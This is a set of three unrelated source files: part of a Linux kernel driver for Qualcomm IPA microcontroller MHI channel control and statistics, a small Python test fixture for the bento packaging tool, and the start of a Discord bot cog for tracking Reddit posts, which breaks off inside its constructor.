IpaHwMhiInitCmdData_t { u32 msiAddress; u32 mmioBaseAddress; u32 deviceMhiCtrlBaseAddress; u32 deviceMhiDataBaseAddress; u32 firstChannelIndex; u32 firstEventRingIndex; }; /** * Structure holding the parameters for IPA_CPU_2_HW_CMD_MHI_INIT_CHANNEL * command. Parameters are sent as 32b immediate parameters. * @hannelHandle: The channel identifier as allocated by driver. * value is within the range 0 to IPA_HW_MAX_CHANNEL_HANDLE * @contexArrayIndex: Unique index for channels, between 0 and 255. 
The index is * used as an index in channel context array structures. * @bamPipeId: The BAM pipe number for pipe dedicated for this channel * @channelDirection: The direction of the channel as defined in the channel * type field (CHTYPE) in the channel context data structure. * @reserved: reserved. */ union IpaHwMhiInitChannelCmdData_t { struct IpaHwMhiInitChannelCmdParams_t { u32 channelHandle:8; u32 contexArrayIndex:8; u32 bamPipeId:6; u32 channelDirection:2; u32 reserved:8; } params; u32 raw32b; }; /** * Structure holding the parameters for IPA_CPU_2_HW_CMD_MHI_UPDATE_MSI command. * @msiAddress_low: The MSI lower base addr (in device space) used for asserting * the interrupt (MSI) associated with the event ring. * @msiAddress_hi: The MSI higher base addr (in device space) used for asserting * the interrupt (MSI) associated with the event ring. * @msiMask: Mask indicating number of messages assigned by the host to device * @msiData: Data Pattern to use when generating the MSI */ struct IpaHwMhiMsiCmdData_t { u32 msiAddress_low; u32 msiAddress_hi; u32 msiMask; u32 msiData; }; /** * Structure holding the parameters for * IPA_CPU_2_HW_CMD_MHI_CHANGE_CHANNEL_STATE command. * Parameters are sent as 32b immediate parameters. * @requestedState: The requested channel state as was indicated from Host. * Use IPA_HW_MHI_CHANNEL_STATES to specify the requested state * @channelHandle: The channel identifier as allocated by driver. * value is within the range 0 to IPA_HW_MAX_CHANNEL_HANDLE * @LPTransitionRejected: Indication that low power state transition was * rejected * @reserved: reserved */ union IpaHwMhiChangeChannelStateCmdData_t { struct IpaHwMhiChangeChannelStateCmdParams_t { u32 requestedState:8; u32 channelHandle:8; u32 LPTransitionRejected:8; u32 reserved:8; } params; u32 raw32b; }; /** * Structure holding the parameters for * IPA_CPU_2_HW_CMD_MHI_STOP_EVENT_UPDATE command. * Parameters are sent as 32b immediate parameters. 
 * @channelHandle: The channel identifier as allocated by driver.
 *	value is within the range 0 to IPA_HW_MAX_CHANNEL_HANDLE
 * @reserved: reserved
 */
union IpaHwMhiStopEventUpdateData_t {
	struct IpaHwMhiStopEventUpdateDataParams_t {
		u32 channelHandle:8;
		u32 reserved:24;
	} params;
	u32 raw32b;
};

/**
 * Structure holding the parameters for
 * IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE response.
 * Parameters are sent as 32b immediate parameters.
 * @state: The new channel state. In case state is not as requested this is
 *	error indication for the last command
 * @channelHandle: The channel identifier
 * @additonalParams: For stop: the number of pending bam descriptors currently
 *	queued
 */
union IpaHwMhiChangeChannelStateResponseData_t {
	struct IpaHwMhiChangeChannelStateResponseParams_t {
		u32 state:8;
		u32 channelHandle:8;
		u32 additonalParams:16;
	} params;
	u32 raw32b;
};

/**
 * Structure holding the parameters for
 * IPA_HW_2_CPU_EVENT_MHI_CHANNEL_ERROR event.
 * Parameters are sent as 32b immediate parameters.
 * @errorType: Type of error - IPA_HW_CHANNEL_ERRORS
 * @channelHandle: The channel identifier as allocated by driver.
 *	value is within the range 0 to IPA_HW_MAX_CHANNEL_HANDLE
 * @reserved: reserved
 */
union IpaHwMhiChannelErrorEventData_t {
	struct IpaHwMhiChannelErrorEventParams_t {
		u32 errorType:8;
		u32 channelHandle:8;
		u32 reserved:16;
	} params;
	u32 raw32b;
};

/**
 * Structure holding the parameters for
 * IPA_HW_2_CPU_EVENT_MHI_CHANNEL_WAKE_UP_REQUEST event.
 * Parameters are sent as 32b immediate parameters.
 * @channelHandle: The channel identifier as allocated by driver.
 *	value is within the range 0 to IPA_HW_MAX_CHANNEL_HANDLE
 * @reserved: reserved
 */
union IpaHwMhiChannelWakeupEventData_t {
	struct IpaHwMhiChannelWakeupEventParams_t {
		u32 channelHandle:8;
		u32 reserved:24;
	} params;
	u32 raw32b;
};

/**
 * Structure holding the MHI Common statistics
 * @numULDLSync: Number of times UL activity trigged due to DL activity
 * @numULTimerExpired: Number of times UL Accm Timer expired
 * @numChEvCtxWpRead: Number of channel event context WP reads
 * @reserved: reserved, pads the struct to a multiple of 4 words
 */
struct IpaHwStatsMhiCmnInfoData_t {
	u32 numULDLSync;
	u32 numULTimerExpired;
	u32 numChEvCtxWpRead;
	u32 reserved;
};

/**
 * Structure holding the MHI Channel statistics
 * @doorbellInt: The number of doorbell int
 * @reProccesed: The number of ring elements processed
 * @bamFifoFull: Number of times Bam Fifo got full
 * @bamFifoEmpty: Number of times Bam Fifo got empty
 * @bamFifoUsageHigh: Number of times Bam fifo usage went above 75%
 * @bamFifoUsageLow: Number of times Bam fifo usage went below 25%
 * @bamInt: Number of BAM Interrupts
 * @ringFull: Number of times Transfer Ring got full
 * @ringEmpty: umber of times Transfer Ring got empty
 * @ringUsageHigh: Number of times Transfer Ring usage went above 75%
 * @ringUsageLow: Number of times Transfer Ring usage went below 25%
 * @delayedMsi: Number of times device triggered MSI to host after
 *	Interrupt Moderation Timer expiry
 * @immediateMsi: Number of times device triggered MSI to host immediately
 * @thresholdMsi: Number of times device triggered MSI due to max pending
 *	events threshold reached
 * @numSuspend: Number of times channel was suspended
 * @numResume: Number of times channel was suspended
 * @num_OOB: Number of times we indicated that we are OOB
 * @num_OOB_timer_expiry: Number of times we indicated that we are OOB
 *	after timer expiry
 * @num_OOB_moderation_timer_start: Number of times we started timer after
 *	sending OOB and hitting OOB again before we processed threshold
 *	number of packets
 * @num_db_mode_evt: Number of times we indicated that we are in Doorbell mode
 */
struct IpaHwStatsMhiCnlInfoData_t {
	u32 doorbellInt;
	u32 reProccesed;
	u32 bamFifoFull;
	u32 bamFifoEmpty;
	u32 bamFifoUsageHigh;
	u32 bamFifoUsageLow;
	u32 bamInt;
	u32 ringFull;
	u32 ringEmpty;
	u32 ringUsageHigh;
	u32 ringUsageLow;
	u32 delayedMsi;
	u32 immediateMsi;
	u32 thresholdMsi;
	u32 numSuspend;
	u32 numResume;
	u32 num_OOB;
	u32 num_OOB_timer_expiry;
	u32 num_OOB_moderation_timer_start;
	u32 num_db_mode_evt;
};

/**
 * Structure holding the MHI statistics
 * @mhiCmnStats: Stats pertaining to MHI
 * @mhiCnlStats: Stats pertaining to each channel
 */
struct IpaHwStatsMhiInfoData_t {
	struct IpaHwStatsMhiCmnInfoData_t mhiCmnStats;
	struct IpaHwStatsMhiCnlInfoData_t mhiCnlStats[
						IPA_HW_MAX_NUMBER_OF_CHANNELS];
};

/**
 * Structure holding the MHI Common Config info
 * @isDlUlSyncEnabled: Flag to indicate if DL-UL synchronization is enabled
 * @UlAccmVal: Out Channel(UL) accumulation time in ms when DL UL Sync is
 *	enabled
 * @ulMsiEventThreshold: Threshold at which HW fires MSI to host for UL events
 * @dlMsiEventThreshold: Threshold at which HW fires MSI to host for DL events
 */
struct IpaHwConfigMhiCmnInfoData_t {
	u8 isDlUlSyncEnabled;
	u8 UlAccmVal;
	u8 ulMsiEventThreshold;
	u8 dlMsiEventThreshold;
};

/**
 * Structure holding the parameters for MSI info data
 * @msiAddress_low: The MSI lower base addr (in device space) used for asserting
 *	the interrupt (MSI) associated with the event ring.
 * @msiAddress_hi: The MSI higher base addr (in device space) used for asserting
 *	the interrupt (MSI) associated with the event ring.
 * @msiMask: Mask indicating number of messages assigned by the host to device
 * @msiData: Data Pattern to use when generating the MSI
 */
struct IpaHwConfigMhiMsiInfoData_t {
	u32 msiAddress_low;
	u32 msiAddress_hi;
	u32 msiMask;
	u32 msiData;
};

/**
 * Structure holding the MHI Channel Config info
 * @transferRingSize: The Transfer Ring size in terms of Ring Elements
 * @transferRingIndex: The Transfer Ring channel number as defined by host
 * @eventRingIndex: The Event Ring Index associated with this Transfer Ring
 * @bamPipeIndex: The BAM Pipe associated with this channel
 * @isOutChannel: Indication for the direction of channel
 * @reserved_0: Reserved byte for maintaining 4byte alignment
 * @reserved_1: Reserved byte for maintaining 4byte alignment
 */
struct IpaHwConfigMhiCnlInfoData_t {
	u16 transferRingSize;
	u8  transferRingIndex;
	u8  eventRingIndex;
	u8  bamPipeIndex;
	u8  isOutChannel;
	u8  reserved_0;
	u8  reserved_1;
};

/**
 * Structure holding the MHI Event Config info
 * @msiVec: msi vector to invoke MSI interrupt
 * @intmodtValue: Interrupt moderation timer (in milliseconds)
 * @eventRingSize: The Event Ring size in terms of Ring Elements
 * @eventRingIndex: The Event Ring number as defined by host
 * @reserved_0: Reserved byte for maintaining 4byte alignment
 * @reserved_1: Reserved byte for maintaining 4byte alignment
 * @reserved_2: Reserved byte for maintaining 4byte alignment
 */
struct IpaHwConfigMhiEventInfoData_t {
	u32 msiVec;
	u16 intmodtValue;
	u16 eventRingSize;
	u8  eventRingIndex;
	u8  reserved_0;
	u8  reserved_1;
	u8  reserved_2;
};

/**
 * Structure holding the MHI Config info
 * @mhiCmnCfg: Common Config pertaining to MHI
 * @mhiMsiCfg: Config pertaining to MSI config
 * @mhiCnlCfg: Config pertaining to each channel
 * @mhiEvtCfg: Config pertaining to each event Ring
 */
struct IpaHwConfigMhiInfoData_t {
	struct IpaHwConfigMhiCmnInfoData_t mhiCmnCfg;
	struct IpaHwConfigMhiMsiInfoData_t mhiMsiCfg;
	struct IpaHwConfigMhiCnlInfoData_t mhiCnlCfg[
						IPA_HW_MAX_NUMBER_OF_CHANNELS];
	struct IpaHwConfigMhiEventInfoData_t mhiEvtCfg[
					IPA_HW_MAX_NUMBER_OF_EVENTRINGS];
};

/*
 * Driver-side context for the uC MHI feature.
 * @expected_responseOp/@expected_responseParams: the response opcode and
 *	immediate parameters the next uC response must match (see
 *	ipa_uc_mhi_response_hdlr()).
 * @ready_cb: invoked once the uC image is loaded.
 * @wakeup_request_cb: invoked on a channel wake-up event from the uC.
 * @mhi_uc_stats_ofst/@mhi_uc_stats_mmio: SRAM offset and ioremapped view of
 *	the uC-maintained MHI statistics.
 */
struct ipa_uc_mhi_ctx {
	u8 expected_responseOp;
	u32 expected_responseParams;
	void (*ready_cb)(void);
	void (*wakeup_request_cb)(void);
	u32 mhi_uc_stats_ofst;
	struct IpaHwStatsMhiInfoData_t *mhi_uc_stats_mmio;
};

/*
 * Debugfs helpers: append one "name=0x<val>\n" line to dbg_buff. They rely on
 * nBytes/size/dbg_buff being in scope at the expansion site
 * (see ipa_uc_mhi_print_stats()).
 */
#define PRINT_COMMON_STATS(x) \
	(nBytes += scnprintf(&dbg_buff[nBytes], size - nBytes, \
		#x "=0x%x\n", ipa_uc_mhi_ctx->mhi_uc_stats_mmio->mhiCmnStats.x))

#define PRINT_CHANNEL_STATS(ch, x) \
	(nBytes += scnprintf(&dbg_buff[nBytes], size - nBytes, \
		#x "=0x%x\n", ipa_uc_mhi_ctx->mhi_uc_stats_mmio->mhiCnlStats[ch].x))

/* Singleton context; NULL until ipa_uc_mhi_init() succeeds. */
struct ipa_uc_mhi_ctx *ipa_uc_mhi_ctx;

/*
 * uC response callback: accept the response only if both the opcode and the
 * immediate parameters match what the last command armed in the context.
 * Returns 0 (and *uc_status = 0) on a match, -EINVAL otherwise.
 */
static int ipa_uc_mhi_response_hdlr(struct IpaHwSharedMemCommonMapping_t
	*uc_sram_mmio, u32 *uc_status)
{
	IPADBG("responseOp=%d\n", uc_sram_mmio->responseOp);
	if (uc_sram_mmio->responseOp == ipa_uc_mhi_ctx->expected_responseOp &&
	    uc_sram_mmio->responseParams ==
	    ipa_uc_mhi_ctx->expected_responseParams) {
		*uc_status = 0;
		return 0;
	}
	return -EINVAL;
}

/*
 * uC event callback: logs channel errors and forwards wake-up requests to the
 * registered wakeup_request_cb. NOTE(review): the opcode is read through the
 * global ipa_ctx mapping while the payload comes from the uc_sram_mmio
 * argument — presumably they alias the same SRAM; confirm against caller.
 */
static void ipa_uc_mhi_event_hdlr(struct IpaHwSharedMemCommonMapping_t
	*uc_sram_mmio)
{
	if (ipa_ctx->uc_ctx.uc_sram_mmio->eventOp ==
	    IPA_HW_2_CPU_EVENT_MHI_CHANNEL_ERROR) {
		union IpaHwMhiChannelErrorEventData_t evt;
		IPAERR("Channel error\n");
		evt.raw32b = uc_sram_mmio->eventParams;
		IPAERR("errorType=%d channelHandle=%d reserved=%d\n",
			evt.params.errorType, evt.params.channelHandle,
			evt.params.reserved);
	} else if (ipa_ctx->uc_ctx.uc_sram_mmio->eventOp ==
		   IPA_HW_2_CPU_EVENT_MHI_CHANNEL_WAKE_UP_REQUEST) {
		union IpaHwMhiChannelWakeupEventData_t evt;
		IPADBG("WakeUp channel request\n");
		evt.raw32b = uc_sram_mmio->eventParams;
		IPADBG("channelHandle=%d reserved=%d\n",
			evt.params.channelHandle, evt.params.reserved);
		ipa_uc_mhi_ctx->wakeup_request_cb();
	}
}

/*
 * uC event-log-info callback: validates the advertised MHI stats blob
 * (feature bit present, size matches, offset fits inside SRAM) and ioremaps
 * it into mhi_uc_stats_mmio for debugfs consumption. Silently returns on any
 * validation failure after logging.
 */
static void ipa_uc_mhi_event_log_info_hdlr(
	struct IpaHwEventLogInfoData_t *uc_event_top_mmio)
{
	if ((uc_event_top_mmio->featureMask & (1 << IPA_HW_FEATURE_MHI)) == 0) {
		IPAERR("MHI feature missing 0x%x\n",
			uc_event_top_mmio->featureMask);
		return;
	}

	if (uc_event_top_mmio->statsInfo.featureInfo[IPA_HW_FEATURE_MHI].
	    params.size != sizeof(struct IpaHwStatsMhiInfoData_t)) {
		IPAERR("mhi stats sz invalid exp=%zu is=%u\n",
			sizeof(struct IpaHwStatsMhiInfoData_t),
			uc_event_top_mmio->statsInfo.
			featureInfo[IPA_HW_FEATURE_MHI].params.size);
		return;
	}

	ipa_uc_mhi_ctx->mhi_uc_stats_ofst = uc_event_top_mmio->
		statsInfo.baseAddrOffset + uc_event_top_mmio->statsInfo.
		featureInfo[IPA_HW_FEATURE_MHI].params.offset;
	IPAERR("MHI stats ofst=0x%x\n", ipa_uc_mhi_ctx->mhi_uc_stats_ofst);
	/* Reject offsets whose stats blob would extend past mapped SRAM. */
	if (ipa_uc_mhi_ctx->mhi_uc_stats_ofst +
		sizeof(struct IpaHwStatsMhiInfoData_t) >=
		ipa_ctx->ctrl->ipa_reg_base_ofst +
		IPA_SRAM_DIRECT_ACCESS_N_OFST_v2_0(0) + ipa_ctx->smem_sz) {
		IPAERR("uc_mhi_stats 0x%x outside SRAM\n",
			ipa_uc_mhi_ctx->mhi_uc_stats_ofst);
		return;
	}

	ipa_uc_mhi_ctx->mhi_uc_stats_mmio =
		ioremap(ipa_ctx->ipa_wrapper_base +
		ipa_uc_mhi_ctx->mhi_uc_stats_ofst,
		sizeof(struct IpaHwStatsMhiInfoData_t));
	if (!ipa_uc_mhi_ctx->mhi_uc_stats_mmio) {
		IPAERR("fail to ioremap uc mhi stats\n");
		return;
	}
	return;
}

/*
 * Allocate the uC MHI context and register the response/event/log handlers
 * for the MHI feature. Must be called exactly once before any other
 * ipa_uc_mhi_* API. Returns 0 on success, -EFAULT if already initialized,
 * -ENOMEM on allocation failure.
 */
int ipa_uc_mhi_init(void (*ready_cb)(void), void (*wakeup_request_cb)(void))
{
	struct ipa_uc_hdlrs hdlrs;

	if (ipa_uc_mhi_ctx) {
		IPAERR("Already initialized\n");
		return -EFAULT;
	}

	ipa_uc_mhi_ctx = kzalloc(sizeof(*ipa_uc_mhi_ctx), GFP_KERNEL);
	if (!ipa_uc_mhi_ctx) {
		IPAERR("no mem\n");
		return -ENOMEM;
	}

	ipa_uc_mhi_ctx->ready_cb = ready_cb;
	ipa_uc_mhi_ctx->wakeup_request_cb = wakeup_request_cb;

	memset(&hdlrs, 0, sizeof(hdlrs));
	hdlrs.ipa_uc_loaded_hdlr = ipa_uc_mhi_ctx->ready_cb;
	hdlrs.ipa_uc_response_hdlr = ipa_uc_mhi_response_hdlr;
	hdlrs.ipa_uc_event_hdlr = ipa_uc_mhi_event_hdlr;
	hdlrs.ipa_uc_event_log_info_hdlr = ipa_uc_mhi_event_log_info_hdlr;
	ipa_uc_register_handlers(IPA_HW_FEATURE_MHI, &hdlrs);

	IPADBG("Done\n");
	return 0;
}

/*
 * Program the uC MHI engine: sends IPA_CPU_2_HW_CMD_MHI_INIT with the MMIO
 * and host ring addresses, then IPA_CPU_2_HW_CMD_MHI_UPDATE_MSI with the MSI
 * configuration. Each command payload is passed through a DMA-coherent buffer
 * that is freed on both success and failure paths. Clocks are voted for the
 * duration of the call. Returns 0 on success or a negative errno.
 */
int ipa_uc_mhi_init_engine(struct ipa_mhi_msi_info *msi, u32 mmio_addr,
	u32 host_ctrl_addr, u32 host_data_addr, u32 first_ch_idx,
	u32 first_evt_idx)
{
	int res;
	struct ipa_mem_buffer mem;
	struct IpaHwMhiInitCmdData_t *init_cmd_data;
	struct IpaHwMhiMsiCmdData_t *msi_cmd;

	if (!ipa_uc_mhi_ctx) {
		IPAERR("Not initialized\n");
		return -EFAULT;
	}

	ipa_inc_client_enable_clks();

	res = ipa_uc_update_hw_flags(0);
	if (res) {
		IPAERR("ipa_uc_update_hw_flags failed %d\n", res);
		goto disable_clks;
	}

	mem.size = sizeof(*init_cmd_data);
	mem.base = dma_alloc_coherent(ipa_ctx->pdev, mem.size, &mem.phys_base,
		GFP_KERNEL);
	if (!mem.base) {
		IPAERR("fail to alloc DMA buff of size %d\n", mem.size);
		res = -ENOMEM;
		goto disable_clks;
	}
	memset(mem.base, 0, mem.size);
	init_cmd_data = (struct IpaHwMhiInitCmdData_t *)mem.base;
	init_cmd_data->msiAddress = msi->addr_low;
	init_cmd_data->mmioBaseAddress = mmio_addr;
	init_cmd_data->deviceMhiCtrlBaseAddress = host_ctrl_addr;
	init_cmd_data->deviceMhiDataBaseAddress = host_data_addr;
	init_cmd_data->firstChannelIndex = first_ch_idx;
	init_cmd_data->firstEventRingIndex = first_evt_idx;
	res = ipa_uc_send_cmd((u32)mem.phys_base, IPA_CPU_2_HW_CMD_MHI_INIT, 0,
		false, HZ);
	if (res) {
		IPAERR("ipa_uc_send_cmd failed %d\n", res);
		dma_free_coherent(ipa_ctx->pdev, mem.size, mem.base,
			mem.phys_base);
		goto disable_clks;
	}
	dma_free_coherent(ipa_ctx->pdev, mem.size, mem.base, mem.phys_base);

	mem.size = sizeof(*msi_cmd);
	mem.base = dma_alloc_coherent(ipa_ctx->pdev, mem.size, &mem.phys_base,
		GFP_KERNEL);
	if (!mem.base) {
		IPAERR("fail to alloc DMA buff of size %d\n", mem.size);
		res = -ENOMEM;
		goto disable_clks;
	}
	msi_cmd = (struct IpaHwMhiMsiCmdData_t *)mem.base;
	msi_cmd->msiAddress_hi = msi->addr_hi;
	msi_cmd->msiAddress_low = msi->addr_low;
	msi_cmd->msiData = msi->data;
	msi_cmd->msiMask = msi->mask;
	res = ipa_uc_send_cmd((u32)mem.phys_base,
		IPA_CPU_2_HW_CMD_MHI_UPDATE_MSI, 0, false, HZ);
	if (res) {
		IPAERR("ipa_uc_send_cmd failed %d\n", res);
		dma_free_coherent(ipa_ctx->pdev, mem.size, mem.base,
			mem.phys_base);
		goto disable_clks;
	}
	dma_free_coherent(ipa_ctx->pdev, mem.size, mem.base, mem.phys_base);

	res = 0;
disable_clks:
	ipa_dec_client_disable_clks();
	return res;
}
int ipa_uc_mhi_init_channel(int ipa_ep_idx, int channelHandle, int contexArrayIndex, int channelDirection) { int res; union IpaHwMhiInitChannelCmdData_t init_cmd; union IpaHwMhiChangeChannelStateResponseData_t uc_rsp; if (!ipa_uc_mhi_ctx) { IPAERR("Not initialized\n"); return -EFAULT; } if (ipa_ep_idx < 0 || ipa_ep_idx >= IPA_NUM_PIPES) { IPAERR("Invalid ipa_ep_idx.\n"); return -EINVAL; } ipa_inc_client_enable_clks(); memset(&uc_rsp, 0, sizeof(uc_rsp)); uc_rsp.params.state = IPA_HW_MHI_CHANNEL_STATE_RUN; uc_rsp.params.channelHandle = channelHandle; ipa_uc_mhi_ctx->expected_responseOp = IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE; ipa_uc_mhi_ctx->expected_responseParams = uc_rsp.raw32b; memset(&init_cmd, 0, sizeof(init_cmd)); init_cmd.params.channelHandle = channelHandle; init_cmd.params.contexArrayIndex = contexArrayIndex; init_cmd.params.bamPipeId = ipa_ep_idx; init_cmd.params.channelDirection = channelDirection; res = ipa_uc_send_cmd(init_cmd.raw32b, IPA_CPU_2_HW_CMD_MHI_INIT_CHANNEL, 0, false, HZ); if (res) { IPAERR("ipa_uc_send_cmd failed %d\n", res); goto disable_clks; } res = 0; disable_clks: ipa_dec_client_disable_clks(); return res; } int ipa_uc_mhi_reset_channel(int channelHandle) { union IpaHwMhiChangeChannelStateCmdData_t cmd; union IpaHwMhiChangeChannelStateResponseData_t uc_rsp; int res; if (!ipa_uc_mhi_ctx) { IPAERR("Not initialized\n"); return -EFAULT; } ipa_inc_client_enable_clks(); memset(&uc_rsp, 0, sizeof(uc_rsp)); uc_rsp.params.state = IPA_HW_MHI_CHANNEL_STATE_DISABLE; uc_rsp.params.channelHandle = channelHandle; ipa_uc_mhi_ctx->expected_responseOp = IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE; ipa_uc_mhi_ctx->expected_responseParams = uc_rsp.raw32b; memset(&cmd, 0, sizeof(cmd)); cmd.params.requestedState = IPA_HW_MHI_CHANNEL_STATE_DISABLE; cmd.params.channelHandle = channelHandle; res = ipa_uc_send_cmd(cmd.raw32b, IPA_CPU_2_HW_CMD_MHI_CHANGE_CHANNEL_STATE, 0, false, HZ); if (res) { IPAERR("ipa_uc_send_cmd failed %d\n", res); goto 
disable_clks; } res = 0; disable_clks: ipa_dec_client_disable_clks(); return res; } int ipa_uc_mhi_suspend_channel(int channelHandle) { union IpaHwMhiChangeChannelStateCmdData_t cmd; union IpaHwMhiChangeChannelStateResponseData_t uc_rsp; int res; if (!ipa_uc_mhi_ctx) { IPAERR("Not initialized\n"); return -EFAULT; } ipa_inc_client_enable_clks(); memset(&uc_rsp, 0, sizeof(uc_rsp)); uc_rsp.params.state = IPA_HW_MHI_CHANNEL_STATE_SUSPEND; uc_rsp.params.channelHandle = channelHandle; ipa_uc_mhi_ctx->expected_responseOp = IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE; ipa_uc_mhi_ctx->expected_responseParams = uc_rsp.raw32b; memset(&cmd, 0, sizeof(cmd)); cmd.params.requestedState = IPA_HW_MHI_CHANNEL_STATE_SUSPEND; cmd.params.channelHandle = channelHandle; res = ipa_uc_send_cmd(cmd.raw32b, IPA_CPU_2_HW_CMD_MHI_CHANGE_CHANNEL_STATE, 0, false, HZ); if (res) { IPAERR("ipa_uc_send_cmd failed %d\n", res); goto disable_clks; } res = 0; disable_clks: ipa_dec_client_disable_clks(); return res; } int ipa_uc_mhi_resume_channel(int channelHandle, bool LPTransitionRejected) { union IpaHwMhiChangeChannelStateCmdData_t cmd; union IpaHwMhiChangeChannelStateResponseData_t uc_rsp; int res; if (!ipa_uc_mhi_ctx) { IPAERR("Not initialized\n"); return -EFAULT; } ipa_inc_client_enable_clks(); memset(&uc_rsp, 0, sizeof(uc_rsp)); uc_rsp.params.state = IPA_HW_MHI_CHANNEL_STATE_RUN; uc_rsp.params.channelHandle = channelHandle; ipa_uc_mhi_ctx->expected_responseOp = IPA_HW_2_CPU_RESPONSE_MHI_CHANGE_CHANNEL_STATE; ipa_uc_mhi_ctx->expected_responseParams = uc_rsp.raw32b; memset(&cmd, 0, sizeof(cmd)); cmd.params.requestedState = IPA_HW_MHI_CHANNEL_STATE_RUN; cmd.params.channelHandle = channelHandle; cmd.params.LPTransitionRejected = LPTransitionRejected; res = ipa_uc_send_cmd(cmd.raw32b, IPA_CPU_2_HW_CMD_MHI_CHANGE_CHANNEL_STATE, 0, false, HZ); if (res) { IPAERR("ipa_uc_send_cmd failed %d\n", res); goto disable_clks; } res = 0; disable_clks: ipa_dec_client_disable_clks(); return res; } int 
ipa_uc_mhi_stop_event_update_channel(int channelHandle) { union IpaHwMhiStopEventUpdateData_t cmd; int res; if (!ipa_uc_mhi_ctx) { IPAERR("Not initialized\n"); return -EFAULT; } ipa_inc_client_enable_clks(); memset(&cmd, 0, sizeof(cmd)); cmd.params.channelHandle = channelHandle; ipa_uc_mhi_ctx->expected_responseOp = IPA_CPU_2_HW_CMD_MHI_STOP_EVENT_UPDATE; ipa_uc_mhi_ctx->expected_responseParams = cmd.raw32b; res = ipa_uc_send_cmd(cmd.raw32b, IPA_CPU_2_HW_CMD_MHI_STOP_EVENT_UPDATE, 0, false, HZ); if (res) { IPAERR("ipa_uc_send_cmd failed %d\n", res); goto disable_clks; } res = 0; disable_clks: ipa_dec_client_disable_clks(); return res; } int ipa_uc_mhi_send_dl_ul_sync_info(union IpaHwMhiDlUlSyncCmdData_t cmd) { int res; if (!ipa_uc_mhi_ctx) { IPAERR("Not initialized\n"); return -EFAULT; } IPADBG("isDlUlSyncEnabled=0x%x UlAccmVal=0x%x\n", cmd.params.isDlUlSyncEnabled, cmd.params.UlAccmVal); IPADBG("ulMsiEventThreshold=0x%x dlMsiEventThreshold=0x%x\n", cmd.params.ulMsiEventThreshold, cmd.params.dlMsiEventThreshold); ipa_inc_client_enable_clks(); res = ipa_uc_send_cmd(cmd.raw32b, IPA_CPU_2_HW_CMD_MHI_DL_UL_SYNC_INFO, 0, false, HZ); if (res) { IPAERR("ipa_uc_send_cmd failed %d\n", res); goto disable_clks; } res = 0; disable_clks: ipa_dec_client_disable_clks(); return res; } int ipa_uc_mhi_print_stats(char *dbg_buff, int size) { int nBytes = 0; int i; if (!ipa_uc_mhi_ctx->mhi_uc_stats_mmio) { IPAERR("MHI uc stats is not valid\n"); return 0; } nBytes += scnprintf(&dbg_buff[nBytes], size - nBytes, "Common Stats:\n"); PRINT_COMMON_STATS(numULDLSync); PRINT_COMMON_STATS(numULTimerExpired); PRINT_COMMON_STATS(numChEvCtxWpRead); for (i = 0; i < IPA_HW_MAX_NUMBER_OF_CHANNELS; i++) { nBytes += scnprintf(&dbg_buff[nBytes], size - nBytes, "Channel %d Stats:\n", i); PRINT_CHANNEL_STATS(i, doorbellInt); PRINT_CHANNEL_STATS(i, reProccesed); PRINT_CHANNEL_STATS(i, bamFifoFull); PRINT_CHANNEL_STATS(i, bamFifoEmpty); PRINT_CHANNEL_STATS(i, bamFifoUsageHigh); PRINT_CHANNEL_STATS(i, 
bamFifoUsageLow); PRINT_CHANNEL_STATS(i, bamInt); PRINT_CHANNEL_STATS(i, ringFull); PRINT_CHANNEL_STATS(i, ringEmpty); PRINT_CHANNEL_STATS(i, ringUsageHigh); PRINT_CHANNEL_STATS(i, ringUsageLow); PRINT_CHANNEL_STATS(i, delayedMsi); PRINT_CHANNEL_STATS(i, immediateMsi); PRINT_CHANNEL_STATS(i, thresholdMsi); PRINT_CHANNEL_STATS(i, numSuspend); PRINT_CHANNEL_STATS(i, numResume); PRINT_CHANNEL_STATS(i, num_OOB); PRINT_CHANNEL_STATS(i, num_OOB_timer_expiry); PRINT_CHANNEL_STATS(i, num_OOB_moderation_timer_start); PRINT_CHANNEL_STATS(i, num_db_mode_evt); } return nBytes; }
{ "pile_set_name": "Github" }
import os

import bento.testing.bentos
from bento.core.package import PackageDescription
from bento.installed_package_description import (
    InstalledSection, build_manifest_meta_from_pkg)

# FIXME: use correct install path instead of python package hack
BENTOS_DIR = os.path.dirname(bento.testing.bentos.__file__)
SPHINX_META = os.path.join(BENTOS_DIR, "sphinx_meta.info")
SPHINX_META_PKG = PackageDescription.from_file(SPHINX_META)

def create_simple_build_manifest_args(top_node):
    """Create (meta, sections, nodes) fixtures for a minimal build manifest.

    Two empty python script files are materialized under `source/` inside
    top_node, and a single 'pythonfiles' installed section referencing them
    is built alongside manifest metadata derived from the sphinx test package.
    """
    relative_files = ["scripts/foo.py", "scripts/bar.py"]
    source_dir = "source"

    created_nodes = []
    for relative_file in relative_files:
        node = top_node.make_node(os.path.join(source_dir, relative_file))
        node.parent.mkdir()
        node.write("")
        created_nodes.append(node)

    installed = InstalledSection.from_source_target_directories(
        "pythonfiles", "section1",
        os.path.join("$_srcrootdir", source_dir), "$prefix/target",
        relative_files)

    manifest_sections = {"pythonfiles": {"section1": installed}}
    manifest_meta = build_manifest_meta_from_pkg(SPHINX_META_PKG)
    return manifest_meta, manifest_sections, created_nodes
{ "pile_set_name": "Github" }
import asyncio
import logging
import random
import textwrap
from collections import namedtuple
from datetime import datetime, timedelta
from typing import List

from aiohttp import BasicAuth, ClientError
from discord import Colour, Embed, TextChannel
from discord.ext.commands import Cog, Context, group, has_any_role
from discord.ext.tasks import loop
from discord.utils import escape_markdown

from bot.bot import Bot
from bot.constants import Channels, ERROR_REPLIES, Emojis, Reddit as RedditConfig, STAFF_ROLES, Webhooks
from bot.converters import Subreddit
from bot.pagination import LinePaginator
from bot.utils.messages import sub_clyde

log = logging.getLogger(__name__)

# OAuth2 bearer token plus the UTC instant after which it must be renewed.
AccessToken = namedtuple("AccessToken", ["token", "expires_at"])


class Reddit(Cog):
    """Track subreddit posts and show detailed statistics about them."""

    HEADERS = {"User-Agent": "python3:python-discord/bot:1.0.0 (by /u/PythonDiscord)"}
    URL = "https://www.reddit.com"
    OAUTH_URL = "https://oauth.reddit.com"
    MAX_RETRIES = 3

    def __init__(self, bot: Bot):
        self.bot = bot
        self.webhook = None
        self.access_token = None
        self.client_auth = BasicAuth(RedditConfig.client_id, RedditConfig.secret)

        bot.loop.create_task(self.init_reddit_ready())
        self.auto_poster_loop.start()

